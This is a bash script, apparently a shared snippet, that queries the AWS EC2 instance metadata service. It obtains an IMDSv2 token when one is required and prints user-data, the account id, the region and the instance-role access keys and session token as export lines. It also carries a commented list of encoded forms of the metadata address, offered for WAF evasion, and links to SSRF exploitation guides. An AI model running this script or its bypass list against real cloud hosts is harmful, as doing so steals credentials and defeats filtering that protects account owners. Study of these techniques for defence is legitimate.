AWS SSRF metadata and creds
#!/bin/bash | |
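#######################################
# Pull the value of a string field out of a flat JSON document.
# The text is scanned line by line for the key (treated as a grep
# regex), the first ':' splits key from value, and the value is what
# sits between its surrounding double quotes. Two limits are kept for
# compatibility with the original: the key matches as a substring
# ("Key" also hits the "AccessKeyId" line), and a value that itself
# contains ':' is truncated at that character.
# Arguments: $1 - JSON text, one key per line (as the IMDS returns it)
#            $2 - field name to look for
# Outputs:   the unquoted value(s) on stdout, one per matching line
# Returns:   exit status of the last cut (0), even when nothing matched
#######################################
get_key_value() {
  local doc=$1
  local key=$2
  # printf rather than echo so a document starting with '-' is not read
  # as an echo flag; -e keeps a key starting with '-' from being read as
  # a grep option.
  printf '%s\n' "$doc" | grep -e "$key" | cut -d ':' -f 2 | cut -d '"' -f 2
}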
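#######################################
# Derive a region name from an availability-zone name by dropping one
# trailing lowercase letter ("us-east-1a" -> "us-east-1"); a name with
# no such suffix is returned unchanged. Uses parameter expansion
# instead of spawning sed for a single-string edit.
# NOTE(review): presumably only standard AZ names are expected here;
# Local Zone style names with extra segments are not handled — confirm.
# Arguments: $1 - availability-zone name
# Outputs:   region name on stdout, newline-terminated
#######################################
strip_az_suffix() {
  local az=$1
  # ${az%[a-z]} removes the shortest suffix matching a single a-z char.
  printf '%s\n' "${az%[a-z]}"
}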
# Main script: query the EC2 instance metadata service (IMDS) and print what
# it exposes — metadata paths, user-data, account id, region and the
# instance-profile credentials — as `export` lines on stdout. Every step is
# network I/O against the link-local metadata address; nothing is written to
# disk. From the defender's side, the 401 check below is the IMDSv2 control:
# a token-less GET is refused and a session token must first be obtained
# with a PUT, which is what separates IMDSv2 from the v1 behaviour.

# gives 401 as missing token
# is_v2 holds the matching "401" line when IMDSv2 is enforced, else empty.
is_v2=$(curl -s -w "%{http_code}\n" http://169.254.169.254/ | grep 401)
# https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md?plain=1#L549
V2=""
if [[ $is_v2 ]] ; then
# Request a session token valid for 21600 s (6 h) via PUT.
TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"`
# Header fragment appended to the curl command built below.
V2="-H \"X-aws-ec2-metadata-token:$TOKEN\""
fi
# pick an alternate host form for the IMDS address (WAF-evasion list):
# http://instance-data
# http://169.254.169.254
# http://169.254.169.254.nip.io/
# http://425.510.425.510 Dotted decimal with overflow
# http://2852039166 Dotless decimal
# http://7147006462 Dotless decimal with overflow
# http://0xA9.0xFE.0xA9.0xFE Dotted hexadecimal
# http://0xA9FEA9FE Dotless hexadecimal
# http://0x41414141A9FEA9FE Dotless hexadecimal with overflow
# http://0251.0376.0251.0376 Dotted octal
# http://0251.00376.000251.0000376 Dotted octal with padding
# http://0251.254.169.254 Mixed encoding (dotted octal + dotted decimal)
# http://[::ffff:a9fe:a9fe] IPV6 Compressed
# http://[0:0:0:0:0:ffff:a9fe:a9fe] IPV6 Expanded
# http://[0:0:0:0:0:ffff:169.254.169.254] IPV6/IPV4
# http://[fd00:ec2::254] IPV6
# Base command, expanded unquoted below; the host is the dotless-decimal form
# of 169.254.169.254 from the list above. --fail makes curl print nothing on
# an HTTP error, which is what lets the `-n` checks below skip missing data.
CURL="curl --silent --connect-timeout 1 --fail $V2 http://2852039166"
# Section headers; -e is needed so the \n escapes become newlines.
echo -e "\n\n### paths"
# Each line is prefixed with "# " so the output stays a valid shell snippet.
$CURL/latest/meta-data | sed -e 's/^/# /'
echo -e "\n\n### user-data"
$CURL/latest/user-data | sed -e 's/^/# /'
echo -e "\n\n### Account Id"
# identity-credentials/ec2/info is a JSON document carrying "AccountId".
info=$($CURL/latest/meta-data/identity-credentials/ec2/info)
if [ -n "$info" ] ; then
# Unquoted heredoc: the $(...) is expanded before the text is printed.
cat<<EOF
export AWS_ACCOUNT_ID=$(get_key_value "$info" "AccountId")
EOF
fi
echo -e "\n\n### az"
# Region is derived by stripping the AZ's trailing letter (strip_az_suffix).
availability_zone=$($CURL/latest/meta-data/placement/availability-zone)
if [ -n "$availability_zone" ]; then
cat<<EOF
export AWS_DEFAULT_REGION=$(strip_az_suffix "$availability_zone")
EOF
fi
echo -e "\n\n### security creds"
# https://hackingthe.cloud/aws/exploitation/ec2-metadata-ssrf/
# The security-credentials path lists the instance-profile role name; a
# single-line result is assumed here. NOTE(review): an empty or multi-line
# listing would produce a different URL below — confirm that case is handled.
ROLE=$($CURL/latest/meta-data/iam/security-credentials)
#$CURL/latest/meta-data/iam/security-credentials/$ROLE
# Per-role document is JSON with AccessKeyId, SecretAccessKey and Token keys.
credentials=$($CURL/latest/meta-data/iam/security-credentials/$ROLE)
if [ -n "$credentials" ]; then
cat<<EOF
export AWS_EC2_ROLE=$ROLE
export AWS_ACCESS_KEY_ID=$(get_key_value "$credentials" "AccessKeyId")
export AWS_SECRET_ACCESS_KEY=$(get_key_value "$credentials" "SecretAccessKey")
export AWS_SESSION_TOKEN=$(get_key_value "$credentials" "Token")
EOF
fi
# Trailing blank line so the snippet ends cleanly when redirected to a file.
echo ""